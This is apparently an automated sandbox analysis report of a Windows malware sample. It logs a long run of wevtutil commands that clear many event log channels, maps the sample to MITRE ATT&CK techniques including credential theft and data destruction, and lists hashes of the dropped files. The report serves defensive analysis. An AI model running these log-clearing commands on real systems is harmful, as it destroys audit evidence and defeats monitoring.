        wevtutil.exe cl "Microsoft-Windows-SmartScreen/Debug"
        7⤵
        
        PID:276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Audit"
        7⤵
        
        PID:296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Connectivity"
        7⤵
        
        PID:1720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Diagnostic"
        7⤵
        
        PID:292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
        7⤵
        
        PID:4416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
        7⤵
        
        PID:3372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
        7⤵
        
        PID:4528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
        7⤵
        
        PID:4468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Spellchecking-Host/Analytic"
        7⤵
        
        PID:4380
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SruMon/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:1956
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SrumTelemetry"
        7⤵
        
        PID:3220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Debug"
        7⤵
        
        PID:2240
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Diagnostic"
        7⤵
        
        PID:3384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
        7⤵
        
        PID:3792
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StateRepository/Restricted"
        7⤵
        
        PID:3628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
        7⤵
        
        PID:2592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
        7⤵
        
        PID:4940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Admin"
        7⤵
        
        PID:3440
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:1164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Debug"
        7⤵
        
        PID:2328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Diagnose"
        7⤵
        
        PID:3992
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Operational"
        7⤵
        
        PID:3536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Admin"
        7⤵
        Clears Windows event logs
        
        PID:2216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Analytic"
        7⤵
        
        PID:2640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Debug"
        7⤵
        
        PID:1172
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Diagnose"
        7⤵
        
        PID:4220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Operational"
        7⤵
        
        PID:404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Admin"
        7⤵
        
        PID:4400
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Analytic"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Debug"
        7⤵
        
        PID:3368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Diagnose"
        7⤵
        
        PID:4316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Operational"
        7⤵
        
        PID:2600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Admin"
        7⤵
        
        PID:3300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Analytic"
        7⤵
        
        PID:4960
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Debug"
        7⤵
        
        PID:3744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Diagnose"
        7⤵
        
        PID:3748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Health"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Operational"
        7⤵
        
        PID:3980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Tiering-IoHeat/Heat"
        7⤵
        
        PID:460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storage-Tiering/Admin"
        7⤵
        
        PID:5076
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageManagement/Debug"
        7⤵
        
        PID:1856
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageManagement/Operational"
        7⤵
        
        PID:1828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSettings/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:4920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Diagnostic"
        7⤵
        
        PID:2544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Operational"
        7⤵
        
        PID:3260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-Driver/Performance"
        7⤵
        
        PID:4524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
        7⤵
        
        PID:4004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Diagnostic"
        7⤵
        
        PID:5052
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorageSpaces-SpaceManager/Operational"
        7⤵
        
        PID:3396
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Store/Operational"
        7⤵
        
        PID:3044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Storsvc/Diagnostic"
        7⤵
        
        PID:3592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
        7⤵
        
        PID:2212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
        7⤵
        
        PID:2140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
        7⤵
        
        PID:1088
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/PfApLog"
        7⤵
        
        PID:1980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
        7⤵
        
        PID:1468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"
        7⤵
        
        PID:1124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
        7⤵
        
        PID:3460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-System-Profile-HardwareId/Diagnostic"
        7⤵
        
        PID:1548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsHandlers/Debug"
        7⤵
        
        PID:4828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Debug"
        7⤵
        
        PID:1764
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Operational"
        7⤵
        
        PID:1108
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
        7⤵
        
        PID:280
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TCPIP/Operational"
        7⤵
        
        PID:300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
        7⤵
        
        PID:3848
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
        7⤵
        
        PID:3784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
        7⤵
        
        PID:2676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TTS/Diagnostic"
        7⤵
        
        PID:3184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TWinAPI/Diagnostic"
        7⤵
        
        PID:2972
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TWinUI/Diagnostic"
        7⤵
        
        PID:2628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TWinUI/Operational"
        7⤵
        
        PID:4700
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TZSync/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:2584
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TZSync/Operational"
        7⤵
        
        PID:2920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
        7⤵
        
        PID:2536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
        7⤵
        
        PID:2260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
        7⤵
        
        PID:1160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Maintenance"
        7⤵
        
        PID:2256
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
        7⤵
        
        PID:4124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
        7⤵
        
        PID:1580
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
        7⤵
        
        PID:2328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
        7⤵
        
        PID:3544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
        7⤵
        
        PID:4652
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
        7⤵
        
        PID:4220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
        7⤵
        
        PID:2068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
        7⤵
        
        PID:3892
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
        7⤵
        
        PID:4660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
        7⤵
        
        PID:4352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
        7⤵
        
        PID:4048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
        7⤵
        
        PID:3540
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
        7⤵
        
        PID:4072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
        7⤵
        
        PID:3256
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Admin"
        7⤵
        
        PID:3548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Analytic"
        7⤵
        
        PID:2572
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Debug"
        7⤵
        
        PID:420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Operational"
        7⤵
        
        PID:4008
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
        7⤵
        
        PID:2756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
        7⤵
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
        7⤵
        
        PID:5012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
        7⤵
        
        PID:4716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
        7⤵
        
        PID:2212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
        7⤵
        
        PID:2140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
        7⤵
        
        PID:3388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
        7⤵
        
        PID:1004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
        7⤵
        
        PID:2660
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
        7⤵
        
        PID:5072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
        7⤵
        
        PID:2032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
        7⤵
        
        PID:3248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
        7⤵
        
        PID:272
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Tethering-Manager/Analytic"
        7⤵
        
        PID:276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Tethering-Station/Analytic"
        7⤵
        
        PID:1216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
        7⤵
        
        PID:2800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
        7⤵
        
        PID:292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Threat-Intelligence/Analytic"
        7⤵
        
        PID:3372
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Time-Service-PTP-Provider/PTP-Operational"
        7⤵
        
        PID:4528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Time-Service/Operational"
        7⤵
        
        PID:4468

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1620

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1920

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:3992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Time Discovery

T1124

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Data Destruction

T1485

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6960857d16aadfa79d36df8ebbf0e423

SHA1
e1db43bd478274366621a8c6497e270d46c6ed4f

SHA256
f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

SHA512
6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f426165d1e5f7df1b7a3758c306cd4ae

SHA1
59ef728fbbb5c4197600f61daec48556fec651c1

SHA256
b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

SHA512
8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
aca3e1b14c69d2cacdcb484fcd0d1a95

SHA1
e09f5985a4ec3a0e423b01cafdc38b87c4659b07

SHA256
72c1a1e98bcadf9d04c9b1a58be63ef47bcfbb2bda03e1ee953d5069a3fb8882

SHA512
b9a82a4198f7a16e729ca427c2a992a863b51f7f882dd06771075e222f50da25b19e5f5b7e34393f0198fca9bdca555d6f4e092a4134b92a36c18febcb19bcdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
82d9dac2ded677603e40ed766071727d

SHA1
0460cddb04016f7388e0334121187a9ce6b9c92f

SHA256
fafd6034f92bf56699e2593430fd448e4aced67e1aaef3fd8d3c5137583d4d97

SHA512
d78b946e37d02d940d3b3bf536eca727ca067174806973e1ff1e0ea0b29f34bc460afb64ae6eb8be572cc4c48573c4a8e4b6964993d0567fa330b1fc43baec09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
0672e7d55c66d5570eae1004382fd026

SHA1
d24ec885d897899f5aa1687e44cfc2676c14c160

SHA256
61f22de6187f20806a8c7c6c0f63a537f34fcd9f10d051e4eb71a8b8131fa514

SHA512
1cce5a47b58d73fdd55c373cb76c3bc81375c462cec9fc0d4e7d32dd8b7f8a5ea2519fcfcd5f5d6e5287c9b4a89c14091e503070bb1569576cf8ce8c4700352c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\dc0d59b8-cd8c-46b1-8fad-1ac55f5e5b4c.tmp

Filesize
247B

MD5
94bd83393ee4e3c749f28c3414160cbc

SHA1
68effb04ecc392f2ae4ad7bdc1e99b9116da474c

SHA256
e1dbf44fca250f32925910fcd7f59276e46d0d916eff30fdf9f85ef91bcd3d4b

SHA512
203109a405cd685a195e6cdae5d0a624abcd6c6a9333b88f312e50f96bafa03057366bd78bf62df8784ec97f14677d56f8b78b472000044618a784bcf7af3e8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
94ff022298254bd2180ff63b4db9d37d

SHA1
97576f1e5245045694d2994995313e473ef2a90a

SHA256
ec6453444b7c32cffb17b08b632aa6c0efaf3509f28c1dea4a4cf1fe1014e6d7

SHA512
c8c9cd65d50615e3a90183f38b421b4207a4f5099da16972be83945a9353a0242f5735d0bef706a46497fa5fd90b476d9a7626bd41f6b83f1404bd4254d65d13

Download Submit
C:\Users\Admin\AppData\Local\Temp\7078.tmp\7079.tmp\707A.bat

Filesize
39B

MD5
a9832ef693180ebedb5b6ed08f0b3227

SHA1
b4ebcabbafcb1dcd113cbb7f996c3ea6443ce2b2

SHA256
9f32b3a95a985d2022d6926411a54c8f2518da0d92ac4bb213f723eb7dd09567

SHA512
fb227ed1d0fc39c28981b2c8c3a7f6bdd74e19aabdb4a8209f7e1b5de16bea554a0f6e8580109097a5894b305c2d23fb3d68f65d009c28696fe1d6ee7ae8345b

Download Submit
C:\Users\Admin\AppData\Local\Temp\8D08.tmp\8D09.tmp\8D0A.bat

Filesize
845B

MD5
54d18c0e0a34808017e53029d7875c09

SHA1
bca96014c545bd02f964cc3dd368b5c6ce9f2963

SHA256
6be64439c492ac7d840e56b01ba9691f30fbad8e9b296bfe55d0abbb2edc5fae

SHA512
95712df3c3bb07e561d778b0f95f9ab0a93def2d7111123dff22898565d059b10dc0ca13b1d528ed00ec77c511451d452b033bf8bf40898cb53eb9378f32a6b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\E2B5.tmp\E2B6.tmp\E2B7.bat

Filesize
24B

MD5
adf8254c3e44ca2685b52366457fc6c9

SHA1
eaeef81e015e18c274ae5debfa7c511b6d871442

SHA256
eb955b96ff2dabe61d2eb8272ba5e0a30b09364a6b15832a80da7daacb8b0c4f

SHA512
2eff22c775d6cdb21ed17ece2468e5f98c9d04e323a7f39f85552629fdd2e4addc728b2866324749f1b6a565b7cf90c98b2b403a8a6af11197270d5e1fad94a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\FCAB.tmp\FCAC.tmp\FCAD.bat

Filesize
679B

MD5
064bb52705e97caeee4dcbb5c72c1413

SHA1
13107d14185397ad662c08dda51a0ebe7583fbe8

SHA256
a8ef3b7eaef87d32ea17f27c2f9ad0eb46d394fc6f381972657dbae63d0bbb26

SHA512
af599892866fd6bfbe067ee1b2f15e9d201401adedf9db624d0f31d7181754a03cb4ea0fa1fb666598cdb601f212ee79a1c4b437d7e9a25dba901c8c481dc095

Download Submit
C:\Users\Admin\AppData\Roaming\1-RUNFIRST.exe

Filesize
43KB

MD5
6fbe881f1d6480e2e15d3ebe0f493d2d

SHA1
f698079150df242e156223f1b3e46f449bc01415

SHA256
49b84540d5b4b8d2344c25edb042e216592dd1dc78a5c00f2ad9457442c4581c

SHA512
2084a64ab503e214854e02dcb1ed8bff7cab40dad64cb624326d42a087f343a74b7470956c681268725e0ec2f8ab13182c814356d6d6d066a2b0c6da290d16ef

Download Submit
C:\Users\Admin\AppData\Roaming\3combined.bat

Filesize
13KB

MD5
790f1b1425f17c7dc0712486361de838

SHA1
d0056beff646d466a34346ef5c889bfec5cf0986

SHA256
7f01e60396f3dd00c16226f74ab87cd0638368b83c455b04d032f4cba436656a

SHA512
12b1faa363910ed861b831ab4209b93491d78e19ca630650425ed28856435119a1220e675e1971f237139c9140fdf6f70cf6a3ba9083bf2674c0f82fb3df3d4a

Download Submit
C:\Users\Admin\AppData\Roaming\AMIDEWIN.EXE

Filesize
148KB

MD5
182ec3a59bd847fb1bc3e12a41d48fa6

SHA1
2f548bceb819d3843827c1e218af6708db447d4b

SHA256
948dbd2bc128f8dc08267e110020fee3ff5de17cf4aaef89372de29623af96fa

SHA512
91ecc5a76edc2aea4219f68569b54d3e9fe15c2a30a146edc0d09e713feaa739a5c1e7dbfa97e60828696078d43d1f8fd3466234525b099ed6e614e854ac6c4c

Download Submit
C:\Users\Admin\AppData\Roaming\AMIDEWINx64.EXE

Filesize
451KB

MD5
f17ecf761e70feb98c7f628857eedfe7

SHA1
b2c1263c641bdaee8266a05a0afbb455e29e240d

SHA256
311f5c844746d4270b5b971ccef8d74ddedca873eb45f34a1a55f1ea4a3bafcf

SHA512
e5a5f56a85ee0a372990914314b750d5f970b5f91e9084621d63378a3a16a6e64904786883cd026d8aa313606c32667d2a83703f8a22fa800230a6467684d084

Download Submit
C:\Users\Admin\AppData\Roaming\AdvancedEventCleaner.exe

Filesize
219KB

MD5
9353ed7c3ba8e2417ce2664ae7afac16

SHA1
05699a2a2792795db1d8f59273172ad80bdc8b06

SHA256
069b31cb7f9054647b684da4fc5263fa690e32d75729ec6b5c808b0c532b9628

SHA512
cb456c14c9ef6f49a92c989668bedb423e4020b761e627c4d67f90e855e9385d58cf0d1e024a0c728126cccdad2836615d23cd3011a8447470482ca939795262

Download Submit
C:\Users\Admin\AppData\Roaming\Cleaner8.exe

Filesize
156KB

MD5
3546548be0b0940c52ec881d48404818

SHA1
0ded613db5266ffaeac2194bcdd86cec9559ee1c

SHA256
dec2a16531a09d05f1ae64a21c35d53cec5998be22c16a88b2e8b4a36878db9a

SHA512
79cb1de22f0789624e4dff532d28d9203ba231e5d511995562a25da8f112eb21a970cfddf28f14760459dda0407a8f856363fca07afffa5f0a954806af619838

Download Submit
C:\Users\Admin\AppData\Roaming\DevManView.cfg

Filesize
1KB

MD5
c397462965258ee0bbe4742f83d7c977

SHA1
7a12c6504184c38b9e8096357f651a04c170b59c

SHA256
59f1e9118a106e15b2c151080e4167c4c1dc5fd33d2443ca160511ac7d9b781e

SHA512
9ccff5046bfc41e50707d36d0a9f0654f6ef86525a26656d6bc9f5759455a2b328525f4b79ed6102d5e3cf3300027264830067c6b22891a92ccfc7fc33bc9ce2

Download Submit
C:\Users\Admin\AppData\Roaming\DevManView.exe

Filesize
162KB

MD5
33d7a84f8ef67fd005f37142232ae97e

SHA1
1f560717d8038221c9b161716affb7cd6b14056e

SHA256
a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b

SHA512
c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5

Download Submit
C:\Users\Admin\AppData\Roaming\FIXusrTEMPv6.exe

Filesize
219KB

MD5
303dbf6d5ce6b658919091240d5a4a80

SHA1
d45946e1d3c4d973042e0c1bdd88fbc1774f1385

SHA256
70ef91b18f6532b065712b31cd667d64d9fa4248baabaea3d33297250df0fd18

SHA512
666c82cb9ac94fa16739c2c34a23a9ade83f4ac3cad528109c2f255b8eeda6a31c00613346db3e9a0e3d46dc978df00d02bc4483001282bfd4f6861b44e1d408

Download Submit
C:\Users\Admin\AppData\Roaming\UCORESYS.sys

Filesize
15KB

MD5
9555d36fb21b993e5c4b98c2fc2b3671

SHA1
210a98be7da32cea98618c5a9640c23ce518c0ee

SHA256
